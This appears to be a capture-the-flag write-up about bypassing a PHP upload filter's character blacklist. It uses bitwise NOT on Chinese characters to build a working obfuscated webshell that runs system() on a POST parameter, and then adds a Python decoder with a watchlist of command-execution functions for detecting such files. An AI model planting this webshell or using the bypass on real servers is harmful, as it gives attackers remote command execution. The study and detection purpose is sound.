There is a conspicuous comment in the page source, but requesting it returns a 404:
<!--/.nav-collapse --> <!-- /.container -->
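I quickly went to look at the conspicuous upload feature. Analyzing the code shows that it applies a blacklist that has to be bypassed: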
if($contents=file_get_contents($_FILES["file"]["tmp_name"])){
    $data=substr($contents,5);
    foreach ($black_char as $b) {
        if (stripos($data, $b) !== false){
            die("illegal char");
        }
    }
}
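A bit of fuzzing shows that the restriction applies to the contents of the uploaded file:
Following p神's approach, use bitwise NOT to obtain usable characters: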
<?php
error_reporting(0);
// 垂 is an unquoted bare constant; PHP before 8.0 treats it as the string "垂"
$a = ~垂;
echo $a."\n";
echo $a[1];
/* Output:
a}
a
*/
?>
Work out the Chinese characters needed for the webshell:
echo ~茉[$____];//s
echo ~内[$____];//y
echo ~茉[$____];//s
echo ~苏[$____];//t
echo ~的[$____];//e
echo ~咩[$____];//m
echo ~课[$____];//P
echo ~尬[$____];//O
echo ~笔[$____];//S
echo ~端[$____];//T
echo ~瞎[$____];//a
Assemble the webshell, which takes the POST parameter a:
<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);
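When triaging an uploaded file like the one above, the NOT-and-index terms can be resolved statically to show which strings the file builds, even though none of them appear literally in its contents. This is an added example, not code from the original write-up; the function names and WATCHLIST are assumptions, and it assumes every index expression evaluates to 1, as it does on this page.

```python
import re

# PAYLOAD is copied from the write-up above; BENIGN is a constructed sample.
PAYLOAD = (
    "<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];"
    "$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];"
    "$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;"
    "$___($__________[~瞎[$____]]);"
)
BENIGN = '<?php $title = "你好"; echo $title; ?>'

TERM = re.compile(r"~([^\x00-\x7f])\[[^\]]*\]")   # ~<multibyte char>[<index>]
STMT = re.compile(r"(\$\w+)\s*(\.?=)\s*(.+)", re.S)
BARE = re.compile(r"[A-Za-z_]\w*")                 # bare constant, a string before PHP 8
WATCHLIST = {"system", "exec", "passthru", "shell_exec", "eval", "assert",
             "_post", "_get", "_request", "_cookie"}  # illustrative, not exhaustive

def decode_term(ch, index=1):
    """Character PHP produces for ~ch[index]: bitwise NOT of one UTF-8 byte of ch.
    Assumption: the index expression evaluates to 1, as in the write-up."""
    return chr(~ch.encode("utf-8")[index] & 0xFF)

def recover_strings(php_source):
    """Replay `$v = term` / `$v .= term` assignments and return {variable: string}."""
    built = {}
    for stmt in php_source.split(";"):
        m = STMT.fullmatch(stmt.strip())
        if not m:
            continue
        var, op, rhs = m.group(1), m.group(2), m.group(3).strip()
        term = TERM.fullmatch(rhs)
        if term:
            piece = decode_term(term.group(1))
        elif BARE.fullmatch(rhs):
            piece = rhs
        else:
            continue
        built[var] = (built.get(var, "") if op == ".=" else "") + piece
    return built

def findings(php_source):
    """Recovered strings that name a watched function or superglobal."""
    return sorted(s for s in recover_strings(php_source).values()
                  if s.lower() in WATCHLIST)

if __name__ == "__main__":
    print(recover_strings(PAYLOAD))
    print(findings(PAYLOAD), findings(BENIGN))
```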
Read the environment variables to get the flag: